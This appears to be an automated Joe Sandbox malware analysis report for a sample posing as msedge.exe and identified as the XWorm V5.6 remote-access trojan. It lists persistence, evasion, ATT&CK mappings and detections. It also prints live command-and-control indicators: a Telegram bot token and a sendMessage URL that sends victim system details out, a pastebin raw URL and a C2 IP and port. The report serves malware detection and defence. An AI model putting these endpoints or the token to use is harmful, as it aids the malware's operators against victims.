                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\msedge.exeQueries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\msedge.exeQueries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\msedge.exeQueries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\msedge.exeQueries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation
                    Source: C:\Users\user\Desktop\msedge.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: msedge.exe, 00000000.00000002.3374582006.000000001B74A000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3380218892.000000001C3F0000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3380218892.000000001C3FC000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3373638320.000000001B670000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\msedge.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 3840, type: MEMORYSTR
                    Yara detected XWorm
                    Source: Yara matchFile source: msedge.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.msedge.exe.590000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.3362810960.0000000002982000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3370050709.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.2116705178.0000000000592000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 3840, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 3840, type: MEMORYSTR
                    Yara detected XWorm
                    Source: Yara matchFile source: msedge.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.msedge.exe.590000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.3362810960.0000000002982000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3370050709.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.2116705178.0000000000592000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: msedge.exe PID: 3840, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		1
                    Input Capture                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		2
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		12
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory13
                    System Information Discovery                    		Remote Desktop Protocol1
                    Input Capture                    		1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    PowerShell                    		21
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		1
                    Obfuscated Files or Information                    		Security Account Manager221
                    Security Software Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive11
                    Encrypted Channel                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Registry Run Keys / Startup Folder                    		2
                    Software Packing                    		NTDS2
                    Process Discovery                    		Distributed Component Object ModelInput Capture1
                    Non-Standard Port                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets131
                    Virtualization/Sandbox Evasion                    		SSHKeylogging2
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input Capture13
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
                    Virtualization/Sandbox Evasion                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1487310 Sample: msedge.exe Startdate: 03/08/2024 Architecture: WINDOWS Score: 100 42 pastebin.com 2->42 44 api.telegram.org 2->44 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Antivirus / Scanner detection for submitted sample 2->56 62 12 other signatures 2->62 8 msedge.exe 15 6 2->8         started        13 msedge.exe 2->13         started        15 msedge.exe 2->15         started        17 2 other processes 2->17 signatures3 58 Connects to a pastebin service (likely for C&C) 42->58 60 Uses the Telegram API (likely for C&C communication) 44->60 process4 dnsIp5 46 api.telegram.org 149.154.167.220, 443, 49721 TELEGRAMRU United Kingdom 8->46 48 pastebin.com 104.20.3.235, 443, 49720 CLOUDFLARENETUS United States 8->48 50 213.219.149.161, 49722, 7000 EDPNETBE Belgium 8->50 38 C:\Users\user\AppData\Local\msedge.exe, PE32 8->38 dropped 66 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->66 68 Protects its processes via BreakOnTermination flag 8->68 70 Bypasses PowerShell execution policy 8->70 78 2 other signatures 8->78 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        26 2 other processes 8->26 40 C:\Users\user\AppData\...\msedge.exe.log, CSV 13->40 dropped 72 Antivirus detection for dropped file 13->72 74 Multi AV Scanner detection for dropped file 13->74 76 Machine Learning detection for dropped file 13->76 file6 signatures7 process8 signatures9 64 Loading BitLocker PowerShell Module 19->64 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    msedge.exe66%VirustotalBrowse
                    msedge.exe100%AviraTR/Spy.Gen
                    msedge.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\msedge.exe100%AviraTR/Spy.Gen
                    C:\Users\user\AppData\Local\msedge.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\msedge.exe71%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
                    C:\Users\user\AppData\Local\msedge.exe66%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    api.telegram.org2%VirustotalBrowse
                    pastebin.com0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                    http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    http://crl.mic0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://schemas.micr0%URL Reputationsafe
                    https://api.telegram.org0%Avira URL Cloudsafe
                    http://crl.m0%URL Reputationsafe
                    https://api.telegram.org/bot0%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    https://aka.ms/pscore680%URL Reputationsafe
                    http://www.micom/pkiops/Docs/ry.htm00%Avira URL Cloudsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://www.microsoft.co0%Avira URL Cloudsafe
                    http://micrLISTt.couS0%Avira URL Cloudsafe
                    https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=527900%Avira URL Cloudsafe
                    https://api.telegram.org1%VirustotalBrowse
                    https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=5279018187&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A180E0A5D8868829B0C52%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K5GHF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.60%Avira URL Cloudsafe
                    https://github.com/Pester/Pester0%Avira URL Cloudsafe
                    http://www.microsoft.co1%VirustotalBrowse
                    https://github.com/Pester/Pester1%VirustotalBrowse
                    https://api.telegram.org/bot1%VirustotalBrowse
                    http://crl.mB0%Avira URL Cloudsafe
                    http://crl.micft.cMicRosof0%Avira URL Cloudsafe
                    https://pastebin.com0%Avira URL Cloudsafe
                    https://pastebin.com/raw/RPPi3ByL0%Avira URL Cloudsafe
                    https://pastebin.com0%VirustotalBrowse
                    https://pastebin.com/raw/RPPi3ByL1%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.telegram.org
                    		149.154.167.220
                    		truetrueunknown
                    pastebin.com
                    		104.20.3.235
                    		truetrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=5279018187&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A180E0A5D8868829B0C52%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K5GHF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6false
                    • Avira URL Cloud: safe
                    		unknown
                    https://pastebin.com/raw/RPPi3ByLtrue
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2203968122.0000020A19881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2294712290.0000016F10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2445383429.0000026C1B7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.telegram.orgmsedge.exe, 00000000.00000002.3362810960.0000000002925000.00000004.00000800.00020000.00000000.sdmptrue
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.telegram.org/botmsedge.exe, msedge.exe.0.drtrue
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2185819233.0000020A09A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2235325986.0000016F00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2352974812.0000026C0B968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000002.00000002.2209890780.0000020A21CDA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.microsoft.copowershell.exe, 0000000D.00000002.2691169117.00000215ECAE0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.micpowershell.exe, 0000000A.00000002.2471243355.0000026C23F78000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://micrLISTt.couSpowershell.exe, 0000000D.00000002.2693896616.00000215ECD14000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.micrpowershell.exe, 00000005.00000002.2319002787.0000016F7D66C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=52790msedge.exe, 00000000.00000002.3362810960.0000000002925000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.mpowershell.exe, 00000005.00000002.2319654280.0000016F7D6B7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2185819233.0000020A09A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2235325986.0000016F00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2352974812.0000026C0B968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contoso.com/powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2203968122.0000020A19881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2294712290.0000016F10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2445383429.0000026C1B7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.micft.cMicRosofpowershell.exe, 0000000A.00000002.2471243355.0000026C23F78000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2185819233.0000020A09811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2235325986.0000016F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2352974812.0000026C0B741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2507022177.0000021580001000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.mBpowershell.exe, 0000000D.00000002.2697571611.00000215ECDC0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemsedge.exe, 00000000.00000002.3362810960.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2185819233.0000020A09811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2235325986.0000016F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2352974812.0000026C0B741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2507022177.0000021580001000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://pastebin.commsedge.exe, 00000000.00000002.3362810960.00000000028D1000.00000004.00000800.00020000.00000000.sdmptrue
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    104.20.3.235
                    		pastebin.comUnited States
                    		13335CLOUDFLARENETUStrue
                    213.219.149.161
                    		unknownBelgium
                    		9031EDPNETBEfalse
                    149.154.167.220
                    		api.telegram.orgUnited Kingdom
                    		62041TELEGRAMRUtrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1487310
                    Start date and time:2024-08-03 20:09:15 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 53s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:22
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:msedge.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@20/21@2/3
                    EGA Information:
                    • Successful, ratio: 12.5%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 72
                    • Number of non-executed functions: 4
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target msedge.exe, PID 1512 because it is empty
                    • Execution Graph export aborted for target msedge.exe, PID 3176 because it is empty
                    • Execution Graph export aborted for target msedge.exe, PID 6648 because it is empty
                    • Execution Graph export aborted for target msedge.exe, PID 7048 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 2748 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 3172 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 6968 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    14:10:10API Interceptor50x Sleep call for process: powershell.exe modified
                    14:11:07API Interceptor208x Sleep call for process: msedge.exe modified
                    20:11:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msedge C:\Users\user\AppData\Local\msedge.exe
                    20:11:07Task SchedulerRun new task: msedge path: C:\Users\user\AppData\Local\msedge.exe
                    20:11:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msedge C:\Users\user\AppData\Local\msedge.exe
                    20:11:23AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.20.3.235New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                    • pastebin.com/raw/NsQ5qTHr
                    Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                    • pastebin.com/raw/NsQ5qTHr
                    2024 12_59_31 a.m..jsGet hashmaliciousWSHRATBrowse
                    • pastebin.com/raw/NsQ5qTHr
                    PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                    • pastebin.com/raw/NsQ5qTHr
                    213.219.149.161Chrome Update.exeGet hashmaliciousXWormBrowse
                      149.154.167.220rPI209087.exeGet hashmaliciousAgentTeslaBrowse
                        SolaraModified.exeGet hashmaliciousXWormBrowse
                          aznuril.exeGet hashmaliciousXWormBrowse
                            setup.exeGet hashmaliciousXWormBrowse
                              -kredi Karti Hesap #U00d6zeti- 4508 0519.xls.exeGet hashmaliciousSnake KeyloggerBrowse
                                -kredi Karti Hesap #U00d6zeti- 4508 0519.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                  hvmBCe45I1.exeGet hashmaliciousGo InjectorBrowse
                                    Urgent Enquiry-00095875664533332-pdf.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                      QUOTATION_AUGQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        FfRBfYqF5b.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          pastebin.comChrome Update.exeGet hashmaliciousXWormBrowse
                                          • 104.20.3.235
                                          SecuriteInfo.com.Win64.Evo-gen.9790.15318.exeGet hashmaliciousXmrigBrowse
                                          • 104.20.3.235
                                          setup.exeGet hashmaliciousXmrigBrowse
                                          • 172.67.19.24
                                          setup.exeGet hashmaliciousXWormBrowse
                                          • 172.67.19.24
                                          SolaraModified.exeGet hashmaliciousXWormBrowse
                                          • 104.20.3.235
                                          E5r67vtBtc6.exeGet hashmaliciousXmrigBrowse
                                          • 104.20.4.235
                                          Miner-XMR2.exeGet hashmaliciousXmrigBrowse
                                          • 104.20.3.235
                                          WcBQ1Er7ys.exeGet hashmaliciousDCRatBrowse
                                          • 104.20.3.235
                                          VhaWmJu2Sz.exeGet hashmaliciousDCRatBrowse
                                          • 104.20.4.235
                                          receipt-016.vbsGet hashmaliciousRemcos, AsyncRAT, XWormBrowse
                                          • 104.20.4.235
                                          api.telegram.orgrPI209087.exeGet hashmaliciousAgentTeslaBrowse
                                          • 149.154.167.220
                                          SolaraModified.exeGet hashmaliciousXWormBrowse
                                          • 149.154.167.220
                                          aznuril.exeGet hashmaliciousXWormBrowse
                                          • 149.154.167.220
                                          setup.exeGet hashmaliciousXWormBrowse
                                          • 149.154.167.220
                                          -kredi Karti Hesap #U00d6zeti- 4508 0519.xls.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 149.154.167.220
                                          -kredi Karti Hesap #U00d6zeti- 4508 0519.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 149.154.167.220
                                          hvmBCe45I1.exeGet hashmaliciousGo InjectorBrowse
                                          • 149.154.167.220
                                          Urgent Enquiry-00095875664533332-pdf.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          QUOTATION_AUGQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          FfRBfYqF5b.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          TELEGRAMRUwoklsbEMwW.exeGet hashmaliciousVidarBrowse
                                          • 149.154.167.99
                                          https://creativeservices.netflix.com.sg-vnt-2.sosis-berurat.live/Get hashmaliciousUnknownBrowse
                                          • 149.154.167.99
                                          https://creativeservices.netflix.com.sg-vnt-1.sosis-berurat.live/Get hashmaliciousUnknownBrowse
                                          • 149.154.167.99
                                          https://creativeservices.netflix.com.sg-vnt-3.sosis-berurat.live/Get hashmaliciousUnknownBrowse
                                          • 149.154.167.99
                                          rPI209087.exeGet hashmaliciousAgentTeslaBrowse
                                          • 149.154.167.220
                                          SolaraModified.exeGet hashmaliciousXWormBrowse
                                          • 149.154.167.220
                                          aznuril.exeGet hashmaliciousXWormBrowse
                                          • 149.154.167.220
                                          setup.exeGet hashmaliciousXWormBrowse
                                          • 149.154.167.220
                                          -kredi Karti Hesap #U00d6zeti- 4508 0519.xls.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 149.154.167.220
                                          -kredi Karti Hesap #U00d6zeti- 4508 0519.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 149.154.167.220
                                          CLOUDFLARENETUSChrome Update.exeGet hashmaliciousXWormBrowse
                                          • 104.20.3.235
                                          Setup.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                          • 188.114.96.3
                                          gdsowzgr.exeGet hashmaliciousPureLog StealerBrowse
                                          • 104.26.11.250
                                          2.htmlGet hashmaliciousPhisherBrowse
                                          • 104.17.25.14
                                          Agrial_SKM_C590368369060_417161.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                                          • 104.18.3.35
                                          new.batGet hashmaliciousUnknownBrowse
                                          • 104.16.231.132
                                          CNvMbuoe5h.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          • 188.114.96.3
                                          Payment ConfirmationSwift copy.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 104.21.59.93
                                          SWIFT COPY.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                          • 188.114.96.3
                                          zCYHTVvEqm.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                          • 188.114.96.3
                                          EDPNETBEChrome Update.exeGet hashmaliciousXWormBrowse
                                          • 213.219.149.161
                                          pyurUmcf1b.exeGet hashmaliciousUnknownBrowse
                                          • 185.95.73.246
                                          4DU7NWnERk.elfGet hashmaliciousMiraiBrowse
                                          • 212.71.18.80
                                          4pR4wy3RZI.elfGet hashmaliciousMirai, GafgytBrowse
                                          • 94.105.109.149
                                          x3xtJjU3P5.elfGet hashmaliciousMiraiBrowse
                                          • 94.105.109.140
                                          t3ttQtxRbr.elfGet hashmaliciousUnknownBrowse
                                          • 213.219.178.219
                                          mpsl.elfGet hashmaliciousMiraiBrowse
                                          • 94.105.109.139
                                          1GrhAc095b.elfGet hashmaliciousUnknownBrowse
                                          • 79.132.226.219
                                          YVKwT4UFIs.elfGet hashmaliciousMiraiBrowse
                                          • 212.71.1.166
                                          hQO0n4UWb1.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 213.211.168.178

                                          JA3 Fingerprints

